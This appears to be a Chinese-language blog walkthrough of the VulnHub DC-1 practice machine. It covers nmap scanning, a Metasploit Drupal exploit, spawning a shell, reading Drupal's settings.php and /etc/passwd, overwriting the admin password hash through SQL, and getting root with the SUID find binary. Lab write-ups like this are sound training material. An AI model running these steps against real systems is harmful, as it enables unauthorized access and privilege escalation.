vulnhub DC-1 write-up

所需文件

DC-1.zip

Oracle VM VirtualBox

具体安装过程省略

信息收集

使用nmap,对整个网段进行扫描(其实这里可以登陆路由器后台查看DHCP分配,但是有些情况下无法访问路由器后台,所以这里还是建议使用nmap)

nmap -sP 192.168.1.0/24 

image-20211005204159695

对 DC-1.lan (192.168.1.100)进行详细扫描

nmap -T4 192.168.1.100

image-20211005204236048

浏览器访问192.168.1.100,通过Wappalyzer发现CMS为Drupal

image-20211005203310195

尝试进行路径扫描,但是并没有发现什么有价值的信息

./dirsearch.py -u 192.168.1.100 -w "db/dicc.txt" -e php

image-20211005204323731

查看robots.txt,同样一无所获

image-20211005204506001

flag1&flag2

换个思路,通过msf搜索一下此CMS有没有什么可以利用的漏洞

image-20211005204726371

这里我们使用代号为1的利用方式,设置好远程主机的地址,执行,就能看到msf新建了一个session

use 1
set rhosts 192.168.1.100
exploit

image-20211005205040979

接下来我们新建一个反弹shell,在msf中输入shell,输入python -c 'import pty;pty.spawn("/bin/sh")',反弹成功,看下自己的身份以及当前目录下的文件

image-20211005205459934

拿下flag1,看看里面的内容

image-20211005205537349

似乎是在提示我们下一个flag在CMS配置文件中,通过搜索得到,配置文件存储在sites/default/settings.php中,打开瞅一眼

cat sites/default/settings.php

image-20211005205835571

flag3

拿下flag2及数据库,登陆数据库看看

image-20211005210146753

这里我们可以通过操作数据库来修改admin用户的密码,从而登陆CMS的后台,Drupal的密码生成脚本存储在scripts/password-hash.sh`中,执行他,生成`123456对应的hash

./scripts/password-hash.sh 123456

image-20211005210541778

用这串字符替换原有的admin的密码,计科使用123456登陆后台

UPDATE users SET pass="$S$DNx83l0NwX1hJgHhcB4vwFq/9YPJp4xC7rjVPaHBcCFMQIdxMJdl" WHERE uid=1;

image-20211005211219396

登陆成功,拿下flag3

image-20211005211259322

image-20211005211404898

flag4

这里的提示看着像是和提权有关,先在/etc/passwd里面找找试试

cat /etc/passwd

image-20211005211920089

直接拿下

image-20211005211607319

看看内容

image-20211005211649160

flag5

结合flag3的提示,先看看有什么命令是具有root权限,且是当前用户可以执行的

find / -user root -perm -4000

image-20211005213023652

刚好,find命令就满足我们的需求,利用find提权

find ./ aaa -exec "/bin/sh" \;

image-20211005213352065

进入/root目录,拿下

image-20211005213451389

总结

这个靶机相对来说还是非常容易的,没有什么坑,挺适合初学者来练手

点赞
  1. Suenit说道:
    Google Chrome Windows 7

    Fatal error: Uncaught ArgumentCountError: Too few arguments to function Walker_Comment::filter_comment_text(), 1 passed in /www/wwwroot/lolimoe.fun/wp-includes/class-wp-hook.php on line 303 and exactly 2 expected in /www/wwwroot/lolimoe.fun/wp-includes/class-walker-comment.php:267 Stack trace: #0 /www/wwwroot/lolimoe.fun/wp-includes/class-wp-hook.php(303): Walker_Comment->filter_comment_text() #1 /www/wwwroot/lolimoe.fun/wp-includes/plugin.php(189): WP_Hook->apply_filters() #2 /www/wwwroot/lolimoe.fun/wp-content/themes/kratos-master/inc/ua.php(432): apply_filters() #3 /www/wwwroot/lolimoe.fun/wp-content/themes/kratos-master/inc/ua.php(436): user_agent_display_comment() #4 /www/wwwroot/lolimoe.fun/wp-includes/class-wp-hook.php(305): user_agent() #5 /www/wwwroot/lolimoe.fun/wp-includes/plugin.php(189): WP_Hook->apply_filters() #6 /www/wwwroot/lolimoe.fun/wp-includes/comment-template.php(1028): apply_filters() #7 /www/wwwroot/lolimoe.fun/wp-includes/class-walker-comment.php(361): comment_text() #8 /www/wwwroot/lolimoe.fun/wp in /www/wwwroot/lolimoe.fun/wp-includes/class-walker-comment.php on line 267